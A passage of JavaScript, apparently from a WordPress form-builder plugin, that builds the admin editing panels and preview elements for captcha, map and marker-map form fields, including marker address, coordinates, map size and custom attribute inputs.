      	captcha_td3.appendChild(input_captcha);

	
	
	
      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      

      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
	    
      	var main_td  = document.getElementById('show_table');
      
      	td1.appendChild(label);
      	td2.appendChild(adding_type);
      	td2.appendChild(captcha_table);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	if(w_field_label_pos=="top")
				label_top(i);
change_class(w_class, i);
refresh_attr(i, 'type_captcha');
}

function type_map(i, w_center_x, w_center_y, w_long, w_lat, w_zoom, w_width, w_height, w_class, w_info, w_attr_name, w_attr_value){
    document.getElementById("element_type").value="type_map";
	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");

	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";	
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";


	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		
				
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
		edit_main_td7.setAttribute("colspan", "4");
		edit_main_td7.setAttribute("id", "markers");
		
	var center1 = document.createElement('p');
        center1.setAttribute("id", "center1");
		center1.innerHTML="Drag the marker to change marker position."	;
		
		  
	var el_label_location = document.createElement('label');
	    el_label_location.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_location.innerHTML = "Location";
		
	var el_img_add_marker = document.createElement('img');
        el_img_add_marker.setAttribute("src", fmc_plugin_url+'/images/add.png');
	    el_img_add_marker.style.cssText ="cursor:pointer";
        el_img_add_marker.setAttribute("onClick", "add_marker('"+i+"', -1)");
		
	/*var el_info_label = document.createElement('label');
	    el_info_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_info_label.innerHTML = "Marker Info";
	*/
	
	
	
	////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////
	
	

	var el_label_map_size = document.createElement('label');
	    el_label_map_size.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_map_size.innerHTML = "Map size";
	
	var el_map_width = document.createElement('input');
        el_map_width.setAttribute("type", "text");
        el_map_width.setAttribute("value", w_width);
        el_map_width.style.cssText ="margin-left:18px";
 		el_map_width.setAttribute("onKeyPress", "return check_isnum(event)");
        el_map_width.setAttribute("onKeyUp", "change_w_style('"+i+"_elementform_id_temp', this.value);");

	Width = document.createTextNode("Width");
		
	var el_map_height = document.createElement('input');
        el_map_height.setAttribute("type", "text");
        el_map_height.setAttribute("value", w_height);
		el_map_height.style.cssText = "margin-left:15px";
      	el_map_height.setAttribute("onKeyPress", "return check_isnum(event)");
	    el_map_height.setAttribute("onKeyUp", "change_h_style('"+i+"_elementform_id_temp', this.value);");
	
	Height = document.createTextNode("Height");
	
	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
 		el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}
		
	var t  = document.getElementById('edit_table');
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	var br7 = document.createElement('br');
	var br8 = document.createElement('br');
	var br9 = document.createElement('br');
	var br10 = document.createElement('br');
	var br11 = document.createElement('br');
	
	edit_main_td2.appendChild(el_label_location);
	edit_main_td2.appendChild(center1);
	edit_main_td2.appendChild(el_img_add_marker);
	edit_main_td2.setAttribute("colspan", "2");
	
	/*edit_main_td7.appendChild(Address);
	edit_main_td7.appendChild(br9);
	edit_main_td7.appendChild(Longitude);
	edit_main_td7.appendChild(br8);
	edit_main_td7.appendChild(Latitude);
	edit_main_td7.appendChild(br11);
	edit_main_td7.appendChild(Marker_info);
	edit_main_td7_1.appendChild(el_map_address);
	edit_main_td7_1.appendChild(br7);
	edit_main_td7_1.appendChild(el_map_longitude);
	edit_main_td7_1.appendChild(br2);
	edit_main_td7_1.appendChild(el_map_latitude);
	edit_main_td7_1.appendChild(br10);
	edit_main_td7_1.appendChild(el_info_textarea);*/
	
//	edit_main_td2.appendChild(br3);

	edit_main_td3.appendChild(el_label_map_size);
	edit_main_td3_1.appendChild(Width);
	edit_main_td3_1.appendChild(el_map_width);
	edit_main_td3_1.appendChild(br5);
	edit_main_td3_1.appendChild(Height);
	edit_main_td3_1.appendChild(el_map_height);

	
	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	
	edit_main_td6.appendChild(el_attr_label);
	edit_main_td6.appendChild(el_attr_add);
	edit_main_td6.appendChild(br6);
	edit_main_td6.appendChild(el_attr_table);
	edit_main_td6.setAttribute("colspan", "2");
	
/*	edit_main_td5.appendChild(el_guidelines_label);
	edit_main_td5.appendChild(br4);
	edit_main_td5.appendChild(el_guidelines_textarea);
*/	
	edit_main_tr2.appendChild(edit_main_td2);
	
	edit_main_tr7.appendChild(edit_main_td7);
	//edit_main_tr7.appendChild(edit_main_td7_1);
	
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	
	
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr7);
//	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
//show table

	element='div';
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_map");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	
	var adding = document.createElement('div');
		adding.setAttribute("id", i+"_elementform_id_temp");
		adding.style.cssText = "width:"+w_width+"px; height: "+w_height+"px";
		adding.setAttribute("zoom", w_zoom);
		adding.setAttribute("center_x", w_center_x);
		adding.setAttribute("center_y", w_center_y);
		
	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = "map_"+i;
            	label.style.cssText = 'display:none';
		
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
					
      	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'middle');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
            	td1.style.cssText = 'display:none';
		
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'middle');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");
			
      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      

      	var main_td  = document.getElementById('show_table');
      
      	td1.appendChild(label);
      	td2.appendChild(adding_type);
      	td2.appendChild(adding);

      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
change_class(w_class, i);
refresh_attr(i, 'type_text');
if_gmap_init(i);

		
	n=w_long.length;
	for(j=0; j<n; j++)
	{	
		add_marker(i,j, w_long[j], w_lat[j], w_info[j]);
 	}
    
}

function add_marker(id, i, w_long, w_lat, w_info)
{

	edit_main_td7=document.getElementById('markers');
	
	if(i==-1)
	{
		if(edit_main_td7.lastChild)
			i=parseInt(edit_main_td7.lastChild.getAttribute("idi"))+1;
		else
			i=0;
		w_long=null;
		w_lat=null;
		w_info='';

	}
	
		var table_marker = document.createElement('table');
			table_marker.setAttribute("width", "100%");
			table_marker.setAttribute("border", "0");
			table_marker.setAttribute("id", "marker_opt"+i);
			table_marker.setAttribute("idi", i);
			//table_marker.style.cssText = "border-top: 1px dotted #D1C8C8;";
	

		var tr_marker = document.createElement('tr');
		var tr_hr = document.createElement('tr');
		
		var td_marker = document.createElement('td');
		var td_X = document.createElement('td');
		var td_hr = document.createElement('td');
		    td_hr.setAttribute("colspan", "3");
		tr_hr.appendChild(td_hr);
		tr_marker.appendChild(td_marker);
		tr_marker.appendChild(td_X);
		table_marker.appendChild(tr_marker);
		
		var br1 = document.createElement('br');
		var br2 = document.createElement('br');
		var br3 = document.createElement('br');
		
		var hr = document.createElement('hr');
		hr.setAttribute("id", "br"+i);
		
		var el_info_textarea = document.createElement('textarea');
			el_info_textarea.setAttribute("id", "info"+i);
			el_info_textarea.setAttribute("rows", "3");
			el_info_textarea.setAttribute("value", w_info);
			el_info_textarea.style.cssText = "width:200px;";
			el_info_textarea.setAttribute("onKeyUp", "change_info(this.value,'"+id+"','"+i+"')");
			el_info_textarea.innerHTML=w_info;
		
		var Marker_info = document.createElement('label');
			Marker_info.style.cssText =" font-size: 11px; vertical-align:top; margin-right:43px";
			Marker_info.innerHTML = "Marker Info";
	
		var el_map_address = document.createElement('input');
			el_map_address.setAttribute("id", "addrval"+i);
			el_map_address.setAttribute("type", "text");
			el_map_address.setAttribute("value", "");
			el_map_address.setAttribute("size", "40");
			el_map_address.setAttribute("onchange", "changeAddress("+id+","+i+")");
	
		var Address = document.createElement('label');
			Address.style.cssText =" font-size: 11px; vertical-align:top; margin-right:55px";
			Address.innerHTML = "Address";
	
		var el_map_longitude = document.createElement('input');
			el_map_longitude.setAttribute("id", "longval"+i);
			el_map_longitude.setAttribute("type", "text");
			el_map_longitude.setAttribute("value", w_long);
			el_map_longitude.setAttribute("size", "10");
			el_map_longitude.setAttribute("onkeyup", "update_position("+id+", "+i+");");
		
	
		var Longitude = document.createElement('label');
			Longitude.style.cssText =" font-size: 11px; vertical-align:top; margin-right:50px";
			Longitude.innerHTML = "Longitude";
			
		var el_map_latitude = document.createElement('input');
			el_map_latitude.setAttribute("id", "latval"+i);
			el_map_latitude.setAttribute("type", "text");
			el_map_latitude.setAttribute("value", w_lat);
			el_map_latitude.setAttribute("size", "10");
			el_map_latitude.setAttribute("onkeyup", "update_position("+id+", "+i+");");
		
		var Latitude = document.createElement('label');
			Latitude.style.cssText =" font-size: 11px; vertical-align:top; margin-right:59px";
			Latitude.innerHTML = "Latitude";
			

		
		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_button"+i+"_remove");
			el_choices_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_map("+id+","+i+")");
			
		td_hr.appendChild(hr);
		
		
		td_marker.appendChild(Address);
		td_marker.appendChild(el_map_address);
		td_marker.appendChild(br1);
		td_marker.appendChild(Longitude);
		td_marker.appendChild(el_map_longitude);
		td_marker.appendChild(br2);
		td_marker.appendChild(Latitude);
		td_marker.appendChild(el_map_latitude);
		td_marker.appendChild(br3);
		td_marker.appendChild(Marker_info);
		td_marker.appendChild(el_info_textarea);
		td_X.appendChild(el_choices_remove);
		edit_main_td7.appendChild(table_marker);
	
	
	var adding = document.getElementById(id+"_elementform_id_temp")
		adding.setAttribute("long"+i, w_long);
		adding.setAttribute("lat"+i, w_lat);
 		adding.setAttribute("info"+i, w_info);
   

add_marker_on_map(id, i, w_long, w_lat, w_info, true);
}

function remove_map(id,i)
{
	table=document.getElementById('marker_opt'+i);
	table.parentNode.removeChild(table);
	map=document.getElementById(id+"_elementform_id_temp");
	map.removeAttribute("long"+i);
	map.removeAttribute("lat"+i);
 	map.removeAttribute("info"+i);

	reomve_marker(id,i);
}




function type_mark_map(i, w_field_label, w_field_label_pos, w_center_x, w_center_y, w_long, w_lat, w_zoom, w_width, w_height, w_class, w_info, w_attr_name, w_attr_value){
    document.getElementById("element_type").value="type_mark_map";
	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");

	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");

	var edit_main_tr8  = document.createElement('tr');
      		edit_main_tr8.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";	
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";


	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		
				
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
	var edit_main_td8_1 = document.createElement('td');
		edit_main_td8_1.style.cssText = "padding-top:10px";
		

	//////////////////////////////////////////////////////////////////////////////////////////////

	var el_label_label = document.createElement('label');
			        el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px;";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
			        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                

                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
		el_label_position1.setAttribute("checked", "checked");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
	

                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
	
	if(w_field_label_pos=="top")
	
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");

//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////	
	var center1 = document.createElement('p');
		center1.innerHTML="Drag the marker to change default marker position."	;
		
		  
	var el_label_location = document.createElement('label');
	        el_label_location.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_location.innerHTML = "Default Location";
	
	var el_map_address = document.createElement('input');
                el_map_address.setAttribute("id", "addrval0");
                el_map_address.setAttribute("type", "text");
                el_map_address.setAttribute("value", "");
				
                el_map_address.setAttribute("size", "40");
                el_map_address.setAttribute("onchange", "changeAddress("+i+",0)");
	Address = document.createTextNode("Address");
	var el_map_longitude = document.createElement('input');
                el_map_longitude.setAttribute("id", "longval0");
                el_map_longitude.setAttribute("type", "text");
                el_map_longitude.setAttribute("value", w_long);
                el_map_longitude.setAttribute("size", "10");
                el_map_longitude.setAttribute("onkeyup", "update_position("+i+", 0);");
	Longitude = document.createTextNode("Longitude");
		
	var el_map_latitude = document.createElement('input');
                el_map_latitude.setAttribute("id", "latval0");
                el_map_latitude.setAttribute("type", "text");
                el_map_latitude.setAttribute("value", w_lat);
                el_map_latitude.setAttribute("size", "10");
                el_map_latitude.setAttribute("onkeyup", "update_position("+i+", 0);");
	Latitude = document.createTextNode("Latitude");

	var el_label_map_size = document.createElement('label');
	        el_label_map_size.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_map_size.innerHTML = "Map size";
	
	var el_map_width = document.createElement('input');
                el_map_width.setAttribute("type", "text");
                el_map_width.setAttribute("value", w_width);
                el_map_width.style.cssText ="margin-left:18px";
 		el_map_width.setAttribute("onKeyPress", "return check_isnum(event)");
                el_map_width.setAttribute("onKeyUp", "change_w_style('"+i+"_elementform_id_temp', this.value);");

	Width = document.createTextNode("Width");
		
	var el_map_height = document.createElement('input');
                el_map_height.setAttribute("type", "text");
                el_map_height.setAttribute("value", w_height);
		el_map_height.style.cssText = "margin-left:15px";
      		el_map_height.setAttribute("onKeyPress", "return check_isnum(event)");
	        el_map_height.setAttribute("onKeyUp", "change_h_style('"+i+"_elementform_id_temp', this.value);");
	Height = document.createTextNode("Height");

	var el_info_label = document.createElement('label');
	        el_info_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_info_label.innerHTML = "Marker Info";
	
	var el_info_textarea = document.createElement('textarea');
                el_info_textarea.setAttribute("id", "info0");
                el_info_textarea.setAttribute("rows", "3");
 		el_info_textarea.setAttribute("value", w_class);
                el_info_textarea.style.cssText = "width:200px; margin-left:2px";
                el_info_textarea.setAttribute("onKeyUp", "change_info(this.value,'"+i+"','"+0+"')");
		el_info_textarea.innerHTML=w_info;
		
	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
 		el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}
		
	var t  = document.getElementById('edit_table');
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	var br7 = document.createElement('br');
	var br8 = document.createElement('br');
	var br9 = document.createElement('br');
	var br10 = document.createElement('br');
	


	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td8.appendChild(el_label_position_label);
	edit_main_td8_1.appendChild(el_label_position1);
	edit_main_td8_1.appendChild(Left);
	edit_main_td8_1.appendChild(br10);
	edit_main_td8_1.appendChild(el_label_position2);
	edit_main_td8_1.appendChild(Top);
	

	edit_main_td2.appendChild(el_label_location);
	edit_main_td2.appendChild(center1);
	edit_main_td2.setAttribute("colspan", "2");
	
	edit_main_td7.appendChild(Address);
	edit_main_td7.appendChild(br9);
